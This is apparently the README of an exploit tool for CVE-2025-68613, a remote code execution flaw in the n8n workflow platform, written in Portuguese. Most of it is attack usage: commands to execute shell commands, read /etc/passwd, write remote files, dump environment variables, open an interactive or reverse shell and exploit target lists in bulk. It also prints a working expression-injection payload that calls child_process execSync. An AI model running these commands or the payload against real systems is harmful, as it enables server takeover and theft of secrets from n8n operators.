n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Execução Remota de Código em Automação de Fluxo de Trabalho
n8n God Mode Ultimate é um framework abrangente de teste de segurança projetado para detectar e validar o CVE-2025-68613 em plataformas de automação de workflows n8n. Esta vulnerabilidade crítica de Execução Remota de Código (RCE) afeta versões do n8n através de injeção de expressões em contextos de execução de workflows.
Versões Afetadas:
Versões Corrigidas:
--detect - Apenas detecção de versão (mais rápida, não intrusiva)--safe - Verificação segura de vulnerabilidade sem exploração--poc - Validação de prova de conceito RCE--exploit - Modo de exploração completoread <file> - Ler arquivos remotoswrite <file> <content> - Escrever arquivos no alvo# Python 3.8 ou superior
python3 --version
# gerenciador de pacotes pip
pip3 --version
# Clone o repositório
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate
# Instale os pacotes necessários
pip3 install -r requirements.txt
requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6
# Exibir menu de ajuda
python3 n8n-godmode-ultimate.py -h
# Detectar versão do n8n (não intrusivo)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect
# Verificação segura de vulnerabilidade
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password
# Prova de conceito RCE
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password
# Exploração completa
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password
# Executar comando único
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --cmd "whoami"
# Ler arquivo remoto
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --read-file "/etc/passwd"
# Escrever arquivo remoto
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"
# Extrair variáveis de ambiente
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --dump-env
# Shell interativo
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --shell
# Escanear múltiplos alvos a partir de arquivo
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20
# Exploração em lote
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10
Formato do targets.txt:
http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org
Uma vez no modo shell (--shell):
n8n> whoami # Executar comando
n8n> read /etc/passwd # Ler arquivo
n8n> env # Mostrar variáveis de ambiente
n8n> info # Informações do sistema
n8n> history # Histórico de comandos
n8n> exit # Sair do shell
-u, --url URL URL do n8n alvo
-l, --list FILE Arquivo contendo URLs dos alvos
-t, --threads NUM Número de threads para varredura em lote (padrão: 10)
-e, --email EMAIL Email do usuário n8n
-p, --password PASS Senha do usuário n8n
--detect Apenas detecção de versão (mais rápida)
--safe Verificação segura sem exploração
--poc Prova de conceito RCE
--exploit Modo de exploração completo
--god Ativar modo deus
--cmd COMMAND Executar comando único
--read-file PATH Ler arquivo remoto
--write-file PATH Escrever arquivo remoto
--content DATA Conteúdo para operação de escrita
--dump-env Extrair todas as variáveis de ambiente
--shell Modo shell interativo
--revshell HOST:PORT Payload de reverse shell
--mode MODE Modo de exploração: schedule|webhook|code|expression (padrão: schedule)
--timeout SEC Tempo limite do comando em segundos (padrão: 30)
--cleanup Excluir workflows após a execução
-k, --insecure Desabilitar verificação SSL
-v, --verbose Saída detalhada
-q, --quiet Saída mínima
Cria um workflow com um gatilho agendado que executa automaticamente a cada 3 segundos. Método mais confiável.
Payload: {{(function(){
return this.process.mainModule.require('child_process')
.execSync('whoami').toString()
})()}}
Cria um endpoint webhook HTTP que executa comandos quando acionado.